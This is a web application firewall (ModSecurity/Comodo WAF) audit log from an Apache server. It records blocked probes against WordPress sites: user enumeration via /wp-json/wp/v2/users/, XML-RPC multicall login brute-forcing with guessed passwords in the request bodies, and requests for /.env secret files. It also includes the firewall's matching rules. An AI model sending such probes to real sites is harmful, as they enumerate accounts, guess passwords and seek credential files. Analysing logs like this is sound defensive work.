%s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748074189140764 723 (- - -) Stopwatch2: 1748074189140764 723; combined=265, p1=225, p2=0, p3=0, p4=0, p5=39, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ef710c47-Z-- --d131de32-A-- [24/May/2025:15:14:12 +0700] aDF_1Pmzt4abyoi_U9n_IQAAAJY 103.236.140.4 52264 103.236.140.4 8181 --d131de32-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 37.156.104.235 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 37.156.104.235 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d131de32-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d131de32-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748074452489027 3130 (- - -) Stopwatch2: 1748074452489027 3130; combined=1365, p1=460, p2=874, p3=0, p4=0, p5=30, sr=82, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d131de32-Z-- --86e04969-A-- [24/May/2025:15:32:56 +0700] aDGEOOO2UzDOKMmK0i6j2AAAAAA 103.236.140.4 52544 103.236.140.4 8181 --86e04969-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 41.57.189.211 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 41.57.189.211 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --86e04969-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --86e04969-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748075576947997 3161 (- - -) Stopwatch2: 1748075576947997 3161; combined=1435, p1=534, p2=870, p3=0, p4=0, p5=31, sr=165, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --86e04969-Z-- --df0c2672-A-- [24/May/2025:15:38:57 +0700] aDGFoeO2UzDOKMmK0i6j6gAAAA8 103.236.140.4 52670 103.236.140.4 8181 --df0c2672-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 148.113.181.253 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 148.113.181.253 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --df0c2672-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --df0c2672-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748075937145722 2914 (- - -) Stopwatch2: 1748075937145722 2914; combined=1313, p1=481, p2=801, p3=0, p4=0, p5=31, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --df0c2672-Z-- --0b43f654-A-- [24/May/2025:16:09:16 +0700] aDGMvOunkxaVeh4NwhbStAAAAEM 103.236.140.4 53022 103.236.140.4 8181 --0b43f654-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 176.88.175.141 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 176.88.175.141 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --0b43f654-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0b43f654-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748077756699346 2706 (- - -) Stopwatch2: 1748077756699346 2706; combined=1215, p1=421, p2=763, p3=0, p4=0, p5=30, sr=71, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0b43f654-Z-- --eb484154-A-- [24/May/2025:16:37:34 +0700] aDGTXjvI5DIWBJ2mFG5L2gAAANY 103.236.140.4 53450 103.236.140.4 8181 --eb484154-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 4.188.78.57 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 4.188.78.57 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --eb484154-C-- system.multicallmethodNamewp.getUsersBlogsparamsdcrepairantix --eb484154-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eb484154-E-- --eb484154-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 4.188.78.57 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748079454194122 4636 (- - -) Stopwatch2: 1748079454194122 4636; combined=3591, p1=403, p2=3020, p3=0, p4=0, p5=100, sr=78, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eb484154-Z-- --269d367d-A-- [24/May/2025:16:39:55 +0700] aDGT6-unkxaVeh4NwhbS2QAAAEg 103.236.140.4 53494 103.236.140.4 8181 --269d367d-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 220.158.233.237 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 220.158.233.237 X-Forwarded-Proto: https Connection: close Content-Length: 487 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --269d367d-C-- system.multicallmethodNamewp.getUsersBlogsparamstuhipintesmoltantix --269d367d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --269d367d-E-- --269d367d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 220.158.233.237 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748079595740138 4728 (- - -) Stopwatch2: 1748079595740138 4728; combined=3691, p1=383, p2=3132, p3=0, p4=0, p5=104, sr=71, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --269d367d-Z-- --534bd94f-A-- [24/May/2025:16:40:43 +0700] aDGUGzvI5DIWBJ2mFG5L6gAAAMo 103.236.140.4 53514 103.236.140.4 8181 --534bd94f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.138.16.24 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.138.16.24 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --534bd94f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --534bd94f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748079643965839 914 (- - -) Stopwatch2: 1748079643965839 914; combined=349, p1=301, p2=0, p3=0, p4=0, p5=48, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --534bd94f-Z-- --692eda33-A-- [24/May/2025:16:43:38 +0700] aDGUyjvI5DIWBJ2mFG5MAgAAANI 103.236.140.4 53642 103.236.140.4 8181 --692eda33-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 178.128.83.108 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.83.108 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --692eda33-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --692eda33-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748079818070969 2211 (- - -) Stopwatch2: 1748079818070969 2211; combined=1133, p1=379, p2=726, p3=0, p4=0, p5=28, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --692eda33-Z-- --151f716c-A-- [24/May/2025:16:44:40 +0700] aDGVCOO2UzDOKMmK0i6kMQAAAAA 103.236.140.4 53672 103.236.140.4 8181 --151f716c-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 220.158.233.237 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 220.158.233.237 X-Forwarded-Proto: https Connection: close Content-Length: 490 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --151f716c-C-- system.multicallmethodNamewp.getUsersBlogsparamssolihinantix_admin@321 --151f716c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --151f716c-E-- --151f716c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 220.158.233.237 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748079880707895 6250 (- - -) Stopwatch2: 1748079880707895 6250; combined=4465, p1=517, p2=3775, p3=0, p4=0, p5=103, sr=121, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --151f716c-Z-- --1d6ee624-A-- [24/May/2025:17:04:14 +0700] aDGZnjvI5DIWBJ2mFG5MegAAAMY 103.236.140.4 54002 103.236.140.4 8181 --1d6ee624-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 65.20.181.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 65.20.181.112 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1d6ee624-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1d6ee624-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748081054344199 2886 (- - -) Stopwatch2: 1748081054344199 2886; combined=1268, p1=420, p2=819, p3=0, p4=0, p5=29, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1d6ee624-Z-- --e1882549-A-- [24/May/2025:17:24:44 +0700] aDGebPmzt4abyoi_U9n_tgAAAJI 103.236.140.4 54542 103.236.140.4 8181 --e1882549-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 151.4.150.42 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 151.4.150.42 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --e1882549-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e1882549-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748082284255303 842 (- - -) Stopwatch2: 1748082284255303 842; combined=337, p1=300, p2=0, p3=0, p4=0, p5=37, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e1882549-Z-- --ceb40d3c-A-- [24/May/2025:17:24:45 +0700] aDGebTvI5DIWBJ2mFG5NFgAAAMk 103.236.140.4 54546 103.236.140.4 8181 --ceb40d3c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 151.4.150.42 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 151.4.150.42 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --ceb40d3c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ceb40d3c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748082285439173 678 (- - -) Stopwatch2: 1748082285439173 678; combined=283, p1=241, p2=0, p3=0, p4=0, p5=42, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ceb40d3c-Z-- --481fed07-A-- [24/May/2025:17:28:21 +0700] aDGfRTvI5DIWBJ2mFG5NNAAAANc 103.236.140.4 54664 103.236.140.4 8181 --481fed07-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 124.105.206.124 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 124.105.206.124 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --481fed07-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --481fed07-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748082501427362 3228 (- - -) Stopwatch2: 1748082501427362 3228; combined=1403, p1=452, p2=919, p3=0, p4=0, p5=32, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --481fed07-Z-- --2942a44b-A-- [24/May/2025:17:38:52 +0700] aDGhvDvI5DIWBJ2mFG5NbwAAANg 103.236.140.4 54838 103.236.140.4 8181 --2942a44b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.138.16.24 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.138.16.24 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --2942a44b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2942a44b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748083132157057 515 (- - -) Stopwatch2: 1748083132157057 515; combined=189, p1=165, p2=0, p3=0, p4=0, p5=24, sr=52, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2942a44b-Z-- --acd0691b-A-- [24/May/2025:17:49:35 +0700] aDGkPzvI5DIWBJ2mFG5NrAAAANQ 103.236.140.4 55082 103.236.140.4 8181 --acd0691b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.111.20.2 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.111.20.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --acd0691b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --acd0691b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748083775588977 2643 (- - -) Stopwatch2: 1748083775588977 2643; combined=1206, p1=442, p2=735, p3=0, p4=0, p5=29, sr=110, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --acd0691b-Z-- --4e2c2255-A-- [24/May/2025:17:55:49 +0700] aDGltfmzt4abyoi_U9n_8gAAAJQ 103.236.140.4 55150 103.236.140.4 8181 --4e2c2255-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 178.254.243.116 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.254.243.116 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --4e2c2255-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4e2c2255-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748084149704889 2800 (- - -) Stopwatch2: 1748084149704889 2800; combined=1268, p1=459, p2=779, p3=0, p4=0, p5=30, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4e2c2255-Z-- --fdf0b62f-A-- [24/May/2025:17:56:17 +0700] aDGl0fmzt4abyoi_U9n_9gAAAIk 103.236.140.4 55160 103.236.140.4 8181 --fdf0b62f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 202.178.115.121 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.178.115.121 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --fdf0b62f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fdf0b62f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748084177440308 2780 (- - -) Stopwatch2: 1748084177440308 2780; combined=1248, p1=421, p2=797, p3=0, p4=0, p5=30, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fdf0b62f-Z-- 